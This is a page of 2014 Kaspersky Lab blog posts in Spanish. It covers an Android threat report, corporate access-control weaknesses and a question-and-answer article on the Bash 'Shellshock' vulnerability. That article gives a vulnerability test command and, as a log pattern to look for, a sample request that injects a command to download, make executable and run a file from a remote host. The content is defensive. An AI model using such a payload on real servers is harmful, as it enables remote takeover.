El panel de cierre fue entretenido y lleno de información interesante. Estuvo a cargo de David Jacoby, que habló de cómo se debería hacer pública la existencia de vulnerabilidades importantes (como Heartbleed y la más reciente infame Shellshock) y los roles que juegan las compañías en estas situaciones. Después de la charla de cierre de Katie Moussouris de HackerOne, llamada “Ganancias y estándares y publicación de vulnerabilidades… ¡oh cielos!", el panel final nos dejó con una sensación de cohesión, sacando a flote las necesidades y retos de la industria en cuanto a la publicación de vulnerabilidades y las dificultades para proteger dispositivos conectados, el Internet de las Cosas, criptomonedas y sistemas de pago.

Los tiempos cambian, pero los retos se mantienen. Lo indiscutible es que seguimos aquí para proteger a los usuarios y luchar contra el cibercrimen.

Informe de Kaspersky Security Network sobre las amenazas móviles: ¡Que Android no pierda un tornillo!


   6 octubre 2014 | 15:00  MSK

Comentar  

Los smartphones y tabletas ya se han establecido como parte de nuestra vida cotidiana. Una encuesta realizada en conjunto por Kaspersky Lab y B2B International en la primavera de 2014, reveló que el 77% de los usuarios de Internet que participaron en la encuesta emplean varios dispositivos para ingresar a la World Wide Web; además de ordenadores tradicionales, suelen usar smartphones y tabletas. Según IDC, casi el 85% del mercado de dispositivos móviles pertenecía a Android en la segunda mitad de 2014. Estas cifras reafirman el indiscutible liderazgo de Android en la comunidad móvil.

También significa que los dispositivos basados en Android llaman la atención de los cibercriminales que están creando y distribuyendo programas maliciosos. Creemos que, el 98,05% de todo el malware existente para móviles ataca a los usuarios de Android. ¿A qué nos referimos con "todo el malware existente"? Nuestra información indica que se detectaron 175.442 programas maliciosos nuevos para Android sólo en la primera mitad de 2014. Eso es el 18,3% (o 32.231 programas maliciosos) más de lo que se vio en todo 2013. Por ésta y otras razones, se puede decir que la gran mayoría de las amenazas virtuales para teléfonos móviles afecta a Android.

Queríamos calcular la magnitud de esta amenaza, así que realizamos este Informe de Kaspersky Security Network sobre amenazas virtuales. Por primera vez, trabajamos con un agente externo en la investigación. Nuestros colegas de la INTERPOL compartieron con nosotros su opinión sobre cómo la industria del cibercrimen ha ido evolucionando y nos ofrecieron información sobre las últimas amenazas para móviles que han estado investigando.

Este estudio se concentra en el periodo de 12 meses entre el 1 de agosto de 2013 y el 31 de julio de 2014. El periodo de estudio se eligió en base a datos de Kaspersky Lab. Kaspersky Lab comenzó a recolectar estadísticas sobre ataques contra usuarios de Android en mayo de 2012. Durante los más dos años que siguieron se hizo evidente que, en el periodo mencionado, las amenazas para Android, la cantidad de ataques y los usuarios afectados crecieron de una forma extraordinaria.

Detecciones de los productos de Kaspersky Lab en  dispositivos Android a lo largo de toda la historia de observaciones


Detecciones de los productos de Kaspersky Lab en dispositivos Android a lo largo de toda la historia de observaciones.

La información que se usó en esta investigación se obtuvo de la Kaspersky Security Network (KSN) basada en la nube, que incluye más de 5.000.000 usuarios de smartphones y tabletas basados en Android y protegidos por productos Kaspersky Lab. La investigación analiza los datos de las amenazas recolectadas desde estos dispositivos.

Los principales descubrimientos de nuestra investigación son:


  • En un periodo de 12 meses, los productos Kaspersky Lab detectaron 3.408.112 amenazas de malware en los dispositivos de 1.023.202 usuarios.

  • Durante el periodo de 10 meses entre agosto de 2013 y marzo de 2014, la cantidad de ataques mensuales se multiplicó casi diez veces, pasando de 69.000 en agosto a 644.000 en marzo de 2014.

  • La cantidad de usuarios atacados también aumentó con rapidez, pasando de 35.000 en agosto 2013 a 242.000 en marzo 2014.

  • 59,06% de las detecciones de malware tenían que ver con programas que podían robar el dinero de los usuarios.

  • Alrededor de 500.000 usuarios se han cruzado con programas para móviles diseñados para robar dinero al menos una vez.

  • Rusia, India, Kazajistán, Vietnam, Ucrania y Alemania son los países que más ataques denunciaron.

  • Los troyanos diseñados para enviar SMS son los que más se propagaron en el periodo estudiado. Representan el 57,08% del total de programas detectados.

  • La cantidad de variantes de troyanos bancarios para teléfonos móviles aumentó 14 veces en un periodo de 12 meses, pasando de algunos cientos a más de 5.000 ejemplares.

El estudio también nos permitió observar en detalle el comportamiento de varios tipos de malware para Android y programas peligrosos de alta difusión. En específico, rastreamos la evolución de los ataques que usaban programas espía y troyanos SMS y bancarios. Un tema separado del estudio es el llamado "programas afiliados". Son esquemas de negocios basados en la web que ayudan a los estafadores a ganar dinero propagando programas maliciosos e infectando los dispositivos de los usuarios. Después, estos programas envían mensajes SMS a números Premium y drenan el dinero de las cuentas prepagadas de sus víctimas.

Durante el periodo de estudio, observamos al menos cuatro programas afiliados activos, que representan alrededor de un cuarto del total de los ataques registrados en ese periodo. Todos estos programas afiliados tenían más actividad en Rusia y países de la ex Unión Soviética, pero cada uno usaba una familia diferente de troyanos de SMS. Otros cuatro programas que observamos afectaban en su mayoría a usuarios de Europa y Asia.

Nos sorprende descubrir que la actividad de casi todos los programas afiliados que vigilamos se redujo de forma notable la primavera pasada. Creemos que una de las razones es una iniciativa anti-fraude que se implantó en Rusia en mayo.

Si quieres saber más sobre las amenazas de Android desde el punto de vista de Kaspersky Lab y la INTERPOL, puedes leer el informe completo de la investigación (en inglés).

Brechas en la defensa de la red corporativa: el control de acceso


  Kirill Kruglov        6 octubre 2014 | 14:30  MSK

Comentar  

Garantizar el funcionamiento ininterrumpido de los sistemas de importancia crítica y al mismo tiempo reducir los riesgos de ataques contra la red corporativa son las principales tareas del departamento TI de cualquier compañía. Una de las estrategias más efectivas para realizar estas tareas es poner límites a los privilegios de los usuarios de los sistemas informáticos.

Desde el punto de vista de la seguridad informática, los sistemas de importancia crítica poseen dos cualidades fundamentales, la integridad y disponibilidad, de las cuales depende su funcionamiento ininterrumpido. Para proteger la red corporativa contra los ataques, es necesario reducir la “superficie de ataque” (attack surface), minimizando la cantidad de dispositivos y servicios de red accesibles desde fuera de la red corporativa y garantizando la defensa de los sistemas y servicios de red que necesitan este acceso (servicios web, portales, enrutadores, estaciones de trabajo, etc.). En particular, los equipos de los usuarios (en la red corporativa) conectados a Internet son el principal vector de ataque contra la red corporativa.

Formalmente, para proteger los sistemas de importancia crítica contra modificaciones no sancionadas y reducir la posibilidad de ataques contra la red corporativa hace falta:

  • determinar qué objetos (equipos, sistemas, aplicaciones de negocios, documentos de valor, etc.) de la red corporativa necesitan protección;
  • describir los procesos de negocio de la compañía y de conformidad con los mismos determinar el nivel de acceso a los objetos de la protección;
  • cerciorarse de que cada sujeto (usuario o aplicación corporativa) tenga una sola cuenta de acceso al sistema;
  • limitar al máximo el acceso de los sujetos a los objetos, es decir, limitar los privilegios de los sujetos en los procesos de negocios;
  • asegurarse de que todas las operaciones de los sujetos sobre los objetos se registren en logs, y que éstos se guarden un lugar seguro.

En la práctica, en la red corporativa ocurre lo siguiente:

  • todos los documentos corporativos se guardan de forma centralizada, en directorios comunes en uno de los servidores de la compañía (por ejemplo, en un servidor que cumple el papel de Document Controller)
  • el acceso a los sistemas de importancia crítica está prohibido a todos, excepto a los administradores: cualquier administrador, en caso de fallos, puede entrar al sistema de forma remota para hacer reparaciones rápidas
  • a veces los administradores usan una sola cuenta “común” de acceso
  • las cuentas de acceso de todos los empleados comunes y corrientes tienen sólo los reducidos privilegios propios de un “usuario común”, pero pueden sin dificultad obtener los privilegios de administrador local

Técnicamente, proteger los sistemas de importancia crítica es mucho más fácil que proteger las estaciones de trabajo, ya que en los primeros los procesos de negocios cambian con poca frecuencia, su reglamento de implementación casi no cambia y por eso se lo puede elaborar tomando en cuenta los detalles más mínimos. Por otra parte, el entorno de trabajo de los usuarios es caótico, los procesos cambian con extrema rapidez, y junto con ellos cambian las exigencias de seguridad. Como si esto fuera poco, muchos usuarios tienen una actitud excéptica e incluso negativa ante cualquier tipo de limitación, incluso si no afecta a los procesos de negocios. Por esta razón la protección tradicional de los usuarios se basa en el principio “es mejor dejar pasar software peligroso que bloquear algo necesario”.

El año pasado la compañía Avecto llevó a cabo una investigación sobre las vulnerabilidades conocidas del software de Microsoft y llegó a la conclusión de que “la renuncia al uso de privilegios de administrador local permite reducir los riesgos de explotación del 92% de las vulnerabilidades críticas del software de Microsoft”. La conclusión parece bastante lógica, pero hay que destacar que la compañía Avecto no realizó una verificación real de las vulnerabilidades, sino que analizó los datos del Boletín de Vulnerabilidades Microsoft 2013. De todos modos es evidente que el software malicioso ejecutado sin privilegios de administrador local no puede instalar drivers, crear o modificar ficheros en los catálogos protegidos (%systemdrive%, %windir%, %programfiles%, etc.), modificar la configuración del sistema (por ejemplo, escribir en la rama HKLM del registro) y sobre todo, no puede usar las funciones privilegiadas del API.

Pero en realidad la ausencia de privilegios de administrador local no es un obstáculo serio ni para el software malicioso, ni para los hackers que han logrado penetrar a la red corporativa. En primer lugar, en cualquier sistema se puede encontrar decenas de vulnerabilidades que permiten obtener los privilegios necesarios, hasta incluso los privilegios de nivel de núcleo. En segundo lugar, existen amenazas que sólo necesitan los privilegios de usuario común para concretarse. En el esquema de abajo se muestran los posibles vectores de ataque que no necesitan privilegios de administrador. Y son justo el tema que queremos abordar.

Ataques locales

Un delincuente que disponga sólo de los privilegios de un usuario normal tendrá acceso irrestricto a la memoria de todos los procesos que funcionen bajo la cuenta de acceso del usuario. Esto es suficiente para incrustar código malicioso en los procesos, con el objetivo de obtener acceso remoto al sistema (backdoor), interceptar pulsaciones de teclas (keylogger), modificar el contenido del navegador de Internet, etc.

Como la mayoría de los antivirus controlan los intentos de incrustación de código desconocido en los procesos, los delincuentes suelen usar trucos más sutiles. Así, un método alternativo de implementación de un backdoor o un keylogger en el proceso de, por ejemplo, un navegador es el uso de plugins y extensiones. Para cargar un plugin son suficientes los privilegios de un usuario común, y el plugin puede hacer casi todo lo que hace un código troyano, por ejemplo administrar el navegador a distancia, registrar en un log los datos ingresados en el navegador y su tráfico, interactuar con los servicios web y modificar el contenido de las páginas (phishing).

A los delincuentes también les interesan las aplicaciones comunes de ofimática (por ejemplo, los programas de correo y de mensajería instantánea) que se pueden usar para lanzar ataques contra otros usuarios en la red (entre ellos phishing e ingeniería social). El delincuente puede obtener acceso a programas como Outlook, The Bat, Lync, Skype, etc. no sólo incrustando código en los procesos correspondientes, sino también mediante el API y los servicios locales de estas aplicaciones.

Es evidente que no sólo las aplicaciones, sino también los datos almacenados en el ordenador pueden representar gran valor para el delincuente. Además de documentos corporativos, los delincuentes con frecuencia buscan ficheros de diferentes aplicaciones que contengan contraseñas, datos cifrados, llaves digitales (SSH, PGP y otros). Si en el equipo del usuario hay códigos fuente, el delincuente puede tratar de incrustarles código malicioso.

Ataques de dominio

Como las cuentas de acceso de la mayoría de los usuarios son de dominio, los mecanismos de autorización en el dominio (Windows Authentication) le proporcionan al usuario acceso a diversos servicios de red en la red corporativa. šCon frecuencia el acceso se proporciona de forma automática, sin verificación adicional del login y la contraseña. Como resultado, si el usuario infectado tiene privilegios de acceso a alguna base de datos corporativa, el delincuente puede usarla con facilidad.

Con la ayuda de la autorización en el dominio el delincuente también tiene acceso a todas las carpetas y discos de red accesibles al usuario, a los recursos de intranet y a veces acceso a otras estaciones de trabajo en el mismo segmento de la red.

Además de las carpetas y bases de datos de red, en la red corporativa no es raro encontrar diferentes servicios de red, como acceso remoto, FTP, SSH, TFS, GIT, SVN, etc. Incluso si para ingresar a estos servicios se usan datos de acceso que no son del dominio, el delincuente puede usarlos cuando el usuario está trabajando (es decir, durante la sesión activa).

Protección

Es casi imposible garantizar un alto nivel de seguridad en las estaciones de trabajo negándoles a los usuarios los privilegios de administrador. Incluso la instalación de software antivirus en la estación sólo aumenta su protección, pero no resuelve todos sus problemas. šLa tecnología de Control de Aplicaciones puede ayudar a alcanzar un alto nivel de seguridad, y consta de tres elementos clave:

  1. Modo “Prohibido por defecto” (Default Deny), que permite instalar y ejecutar sólo el software aprobado por el administrador. No es obligatorio que el administrador ponga cada aplicación en la lista de permitidas (hash). Y es que tiene a su disposición una gran variedad de instrumentos genéricos que permiten agregar de forma dinámica a la lista de permitidas todo el software firmado por uno u otro certificado, creado por determinados fabricantes, recibido de una fuente fiable o que esté presente en la lista blanca de algún proveedor de software de defensa.
  2. El modo de control de aplicaciones fiables permite limitar el funcionamiento del software permitido, haciendo que ejecute sólo aquellas funciones que debe ejecutar. Por ejemplo, para su funcionamiento normal un navegador debe tener la posibilidad de crear conexiones de red, pero no es necesario que lea o escriba en la memoria de otros procesos, que se conecte a bases de datos en la red o que guarde ficheros en las carpetas de red.
  3. El control de instalación de actualizaciones, que permite actualizar sin interrupción el software de las estaciones de trabajo (en el modo de “Prohibido por defecto”), reduciendo al mismo tiempo el riesgo de que los mecanismos de actualización se usen para introducir infecciones.

Además de todo lo enumerado, los productos en concreto que contienen la tecnología Control de Aplicaciones pueden proporcionar diferentes funciones útiles basadas en ésta. En particular, inventariado, control de software instalado desde la red, recopilación de logs de sucesos (que pueden ser útiles durante la investigación de incidentes), etc.

La combinación de tecnologías permite, por una parte, dar al usuario todo lo que necesita para trabajar e incluso para divertirse, y si mañana necesita alguna cosa más, puede obtenerla sin ninguna dificultad. Por otra parte, las posibilidades del delincuente que ha obtenido acceso al sistema protegido están muy limitadas. Sin duda, este es el balance “ideal” entre flexibilidad y seguridad en la protección de la red corporativa.

La vulnerabilidad “Bash” (CVE-2014-6271): preguntas y respuestas


  Global Research & Analysis Team (GReAT), Kaspersky Lab       29 septiembre 2014 | 12:47  MSK

Comentar  

¿Qué es la vulnerabilidad “basch”?

La vulnerabilidad “bash”, descrita como CVE-2014-6271, es una vulnerabilidad extremadamente poderosa debido a su alto impacto y a la facilidad con que se puede explotar. El atacante puede sencillamente ejecutar los comandos del sistema, con los mismos privilegios que los servicios afectados.

En la mayoría de los ejemplos que aparecen en Internet en este momento, los atacantes atacan de forma remota servidores webs que alojan archivos de comando CGI escritos en bash.

Al momento de redactar este artículo, la vulnerabilidad ya había sido utilizada con intenciones maliciosas, como infectar servidores web vulnerables con programas maliciosos, o ataques de hackers. Nuestros investigadores constantemente recopilan nuevas muestras e indicaciones de infecciones relacionadas con esta vulnerabilidad. Pronto publicaremos más información al respecto.

Lo principal que hay que entender es que la vulnerabilidad no está vinculada a ningún servicio específico, como por ejemplo Apache o nginx. En lugar de ello, la vulnerabilidad descansa en el intérprete de comandos de bash que le permite al atacante agregar comandos de sistema a las variables del entorno de bash.

¿Cómo funciona?

Para explicar su funcionamiento, voy a recurrir a los mismos ejemplos que hemos visto en las recomendaciones y en el código prueba de concepto que hemos publicado. Si tienes un archivo de comandos CGI en un servidor web, este archivo de comandos, o script, lee automáticamente algunas variables de ambiente, como tu dirección IP, la versión de tu navegador, y la información sobre tu sistema local.

Pero imagina que no sólo puedes pasarle esta información normal del sistema al script CGI, sino que también le dices al script que ejecute comandos del sistema.

Esto significaría que, sin tener ninguna autorización para el servidor web, en cuanto accedas al script CGI, ésteš leería tus variables de entorno, y si estas contienen la cadena del exploit, el script también ejecutará el comando que has especificado.

¿Qué lo distingue?

Esta vulnerabilidad es única, porque es extremadamente fácil de explotar y el impacto que causa es increíblemente severo, entre otras razones debido a la cantidad de blancos vulnerables. Esto no sólo afecta los servidores web, sino a cualquier programa que use el intérprete de comandos bash y lea datos que puedes controlar.

Los investigadores también están tratando de descubrir si otros intérpretes, como PHP, JSP, Python o Perl, han sido afectados.  Dependiendo de cómo se haya escrito el código, a veces un intérprete utiliza bash para ejecutar algunas funciones, y si este fuera el caso, es posible que otros intérpretes también sirvan para explotar la vulnerabilidad CVE-2014-6271.

El impacto es increíblemente alto ya que hay muchos dispositivos involucrados que utilizan scripts CGI, como los routers, electrodomésticos y puntos de acceso inalámbrico que también son vulnerables y, en muchos casos, difíciles de reparar.

¿Cuál es su nivel de propagación?

Esto es muy difícil decirlo, pero sabemos por nuestros sistemas de inteligencia que estos exploits y gusanos se comenzaron a desarrollar directamente después de que se publicara la información sobre la vulnerabilidad, y tanto los investigadores legítimos como los maliciosos están buscando en Internet servidores vulnerables.

Aún es pronto para saberlo, pero por mi propia investigación sé que existen muchos servidores web con scripts CGI, y estoy bastante seguro de que también veremos muchos otros tipos de exploits diseñados para atacar los archivos locales y los procesos en segundo plano (daemons) en redes. También se ha debatido la vulnerabilidad de los clientes OpenSSH y dhcp a estos ataques.

¿Cómo puedo verificar si mi sistema o sitio web está infectado?

La forma más sencilla de verificar si tu sistema es vulnerable, consiste en abrir un intérprete de comandos bash en tu sistema y ejecutar el siguiente comando:

"env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

Si el intérprete de comandos devuelve la cadena “vulnerable”, entonces tienes que actualizar tu sistema.

También existen herramientas para los usuarios más expertos que se pueden utilizar para verificar si tu servidor está infectado con esta vulnerabilidad.

Consejos para reparar este problema

Lo primero que tienes que hacer es actualizar la versión de tu bash.  Diferentes distribuciones para Linux ofrecen parches para esta vulnerabilidad, y aunque no se ha comprobado aún la efectividad de todos los parches, lo primero que hay que hacer es aplicar el parche.

Si usas algún IDS/IPS, te recomendaría que le añadas/cargues una firma. Se han publicado muchas reglas públicas.

Asimismo, verifica la configuración de tu servidor web.  Si hay algún script CGI que no estés utilizando, es mejor que lo desactives.

¿Hay riesgos para la banca online?

Esta vulnerabilidad se está explotando activamente para atacar servidores alojados en Internet. Incluso son vulnerables algunas estaciones de trabajo con plataformas Linux y OSX, pero los atacantes necesitan encontrar un vector de ataque que funcione de forma remota contra tu equipo de escritorio.

La vulnerabilidad no ataca a los usuarios individuales, sino a los servidores alojados en Internet.  Esto significa, por ejemplo, que si tu sitio web favorito de compras o banca online fuera vulnerable, los atacantes podrían, teóricamente, infectar ese servidor y acceder a tus datos personales, incluyendo quizás tus datos bancarios.

Al momento de redactar este artículo resulta muy difícil decir con exactitud qué plataformas podrían ser vulnerables o pueden haber sido atacadas, pero te recomendaría que por un par de días dejes de usar activamente tu tarjeta de crédito o de compartir tus datos confidenciales, hasta que los investigadores en seguridad hayan encontrado más información sobre esta situación.

¿Puedo detectar si alguien ha vulnerado mi equipo?

Te recomiendo revisar tus registros HTTP y verificar si existe algo sospechoso. Este es un ejemplo de un patrón malicioso:

192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"

Existen también algunos parches para bash que registran cada comando que se pasa al intérprete de datos bash. Esta es una buena manera de ver si alguien ha vulnerado tu equipo. šNo evitará que siga haciéndolo, pero se registrarán las acciones del atacante en tu sistema.

¿Cuál es la gravedad de esta amenaza?

Este virus es sin duda muy peligroso, pero no TODOS los sistemas son vulnerables. Tienen que haber ciertas condiciones para que se pueda vulnerar un servidor web. Uno de los principales problemas ahora es que cuando se publican, los investigadores buscan otras formas de vulnerar bash, exploran otras condiciones que lo permitan, etc. Entonces un parche que ayuda a prevenir la ejecución remota de código no servirá, por ejemplo, para evitar la rescritura de un archivo. Probablemente habrá una serie de parches, pero mientras tanto los sistemas siguen siendo vulnerables.

¿Se trata de un nuevo Heartbleed?

Bueno, para el ciberpirata es mucho más fácil de vulnerar que Heartbleed. Asimismo, en el caso de Heartbleed, los ciberpiratas sólo podían robar datos de la memoria, con la expectativa de encontrar algo útil.   Por el contrario, la vulnerabilidad bash facilita en gran medida el control completo del sistema. Por eso nos parece más peligroso que Heartbleed.

¿Puede utilizarse en futuros APTs?

Por supuesto que podría usarse para el desarrollo de futuros programas maliciosos. Estos programas maliciosos podrían usarse para probar automáticamente la seguridad de una infraestructura, para infectar un sistema, o para atacarlo de otras maneras.

Page Top  |  Archivo >>

 

Copyright © 1996 - 2014
Kaspersky Lab
Todos los derechos reservados

Correo electrónico: webmaster@viruslist.com